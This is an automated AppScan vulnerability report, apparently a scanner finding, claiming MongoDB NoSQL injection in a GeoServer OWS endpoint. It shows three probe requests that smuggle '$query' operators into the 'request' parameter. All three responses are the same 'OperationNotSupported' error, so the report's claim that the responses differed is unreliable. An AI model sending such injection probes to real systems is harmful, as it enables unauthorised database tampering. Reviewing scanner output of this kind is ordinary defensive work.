|
MongoDB NoSQL Injection
Severity: High
CVSS Score: 9,7
URL: http://192.168.12.8:8080/geoserver/ows
Entity: request (Parameter)
Risk: It is possible to view, modify or delete database entries and tables
Causes: Sanitation of hazardous characters was not performed correctly on user input
Fix: Ensure user input is of the correct type and escape it properly
Difference: Parameter manipulated from: GetCapabilities to: GetCapabilities",“$782”:"
Parameter manipulated from: GetCapabilities to: GetCapabilities",“$query”:{},“A”:"
Parameter manipulated from: GetCapabilities to: GetCapabilities",“$query”:
{“Non1Existent2Field”:3}
,“A”:"
Reasoning: AppScan sent three requests: Error, True, and False. All three responses were different from one another, which
insinuates that the MongoDB injection succeeded.
Test Requests and Responses:
GET /geoserver/ows?service=WCS&version=2.0.1&request=GetCapabilities",“$782”:" HTTP/1.1
Cookie: JSESSIONID=kcq93t8as2971prultzmcw9hr
Accept-Language: en-US
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
Referer: http://xxxxxxxxxxxxx:8080/geoserver/web/
Host: xxxxxxxx:8080
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/7.0)
HTTP/1.1 501 Not Implemented
Content-Type: application/xml
Transfer-Encoding: chunked
Server: Jetty(9.2.13.v20150730)
<ows:ExceptionReport xmlns:xs=“http://www.w3.org/2001/XMLSchema” xmlns:ows=“http://www.opengis.net/ows/2.0”
xmlns:xsi=“http://www.w3.org/2001/XMLSchema-instance” version=“2.0.0” xsi:schemaLocation=“http://www.opengis.net/ows/2.0
http://schemas.opengis.net/ows/2.0/owsExceptionReport.xsd”>
<ows:Exception exceptionCode=“OperationNotSupported” locator=“GetCapabilities”,“$782”:“”>
<ows:ExceptionText>No such operation WCS 2.0.1 GetCapabilities","$782":"
</ows:ExceptionText>
</ows:Exception>
</ows:ExceptionReport>
GET /geoserver/ows?service=WCS&version=2.0.1&request=GetCapabilities",“$query”:{},“A”:" HTTP/1.1
Cookie: JSESSIONID=kcq93t8as2971prultzmcw9hr
Accept-Language: en-US
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
Referer: http://xxxxxxxxxx:8080/geoserver/web/
Host: xxxxxxxx:8080
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/7.0)
HTTP/1.1 501 Not Implemented
Content-Type: application/xml
Transfer-Encoding: chunked
Server: Jetty(9.2.13.v20150730)
<ows:ExceptionReport xmlns:xs=“http://www.w3.org/2001/XMLSchema” xmlns:ows=“http://www.opengis.net/ows/2.0”
xmlns:xsi=“http://www.w3.org/2001/XMLSchema-instance” version=“2.0.0” xsi:schemaLocation=“http://www.opengis.net/ows/2.0
http://schemas.opengis.net/ows/2.0/owsExceptionReport.xsd”>
<ows:Exception exceptionCode=“OperationNotSupported” locator=“GetCapabilities”,“$query”:
{},“A”:“”>
<ows:ExceptionText>No such operation WCS 2.0.1 GetCapabilities","$query":
{},"A":"
</ows:ExceptionText>
</ows:Exception>
</ows:ExceptionReport>
GET /geoserver/ows?service=WCS&version=2.0.1&request=GetCapabilities",“$query”:
{“Non1Existent2Field”:3}
,“A”:" HTTP/1.1
Cookie: JSESSIONID=kcq93t8as2971prultzmcw9hr
Accept-Language: en-US
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
Referer: http://192.168.12.8:8080/geoserver/web/
Host: 192.168.12.8:8080
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/7.0)
HTTP/1.1 501 Not Implemented
Content-Type: application/xml
Transfer-Encoding: chunked
Server: Jetty(9.2.13.v20150730)
<ows:ExceptionReport xmlns:xs=“http://www.w3.org/2001/XMLSchema” xmlns:ows=“http://www.opengis.net/ows/2.0”
xmlns:xsi=“http://www.w3.org/2001/XMLSchema-instance” version=“2.0.0” xsi:schemaLocation=“http://www.opengis.net/ows/2.0
http://schemas.opengis.net/ows/2.0/owsExceptionReport.xsd”>
<ows:Exception exceptionCode=“OperationNotSupported” locator=“GetCapabilities”,“$query”:
{“Non1Existent2Field”:3}
,“A”:“”>
<ows:ExceptionText>No such operation WCS 2.0.1 GetCapabilities","$query":
{"Non1Existent2Field":3}
,"A":"
</ows:ExceptionText>
</ows:Exception>
</ows:ExceptionReport>
|